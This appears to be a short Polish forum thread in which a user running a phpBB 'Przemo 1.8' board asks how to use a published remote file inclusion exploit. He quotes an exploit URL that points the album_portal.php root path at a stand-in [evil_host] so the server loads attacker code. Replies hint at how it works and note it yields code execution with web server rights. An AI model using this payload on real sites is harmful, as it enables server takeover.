phpBB modified by Przemo 1.8

mlody_pytacz

Użytkownik
Dołączył
Marzec 24, 2005
Posty
18
Witam,
Wiec tak mam problem (jak zwykle
<
). Otoz mam forum phpbb mb Przemo 1.8 i cos takiego:
http://www.cc-team.org/index.php?name=bugtraq&show=290

Wszystko fajnie ale:

Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php musi istniec na evil_host.[/b]

co mam umiescic w tym evil_file.php. Nie jest to podane w opisie, prosze pomozcie.
 

GreEnSnake

Użytkownik
Dołączył
Kwiecień 21, 2005
Posty
352
Originally posted by mlody_pytacz
Witam,
Wiec tak mam problem (jak zwykle
<
). Otoz mam forum phpbb mb Przemo 1.8 i cos takiego:
http://www.cc-team.org/index.php?name=bugtraq&show=290

Wszystko fajnie ale:

<div class='quotetop'>CYTAT
Exploit:
http://[victim_host]/album_portal.php?phpbb_root_path=http://[evil_host]/&phpEx=/../../[evil_file.php]

evil_file.php musi istniec na evil_host.

co mam umiescic w tym evil_file.php. Nie jest to podane w opisie, prosze pomozcie.[/b][/quote]
Chodzi o dowolny plik ktory mozna podgladnac np. config.php .
Przynajmniej tak mi sie zdaje =] .
 

pura89

Użytkownik
Dołączył
Maj 10, 2004
Posty
8
Originally posted by marcinmx
jest! po http:// :shock:
jeżeli znałbyś się na php to wiedziałbyś, że marcinmx dał ci olbrzymią wskazówkę. Popatrz sobie na adres zobacz jakie zmienne są tam przesyłane i wszystko jasne. na koniec dodam coś jeszcze:
Kod:
wykonanie arbitrazowego kodu z prawami deamona httpd
 

~SD

Użytkownik
Dołączył
Sierpień 26, 2007
Posty
1
Do góry Bottom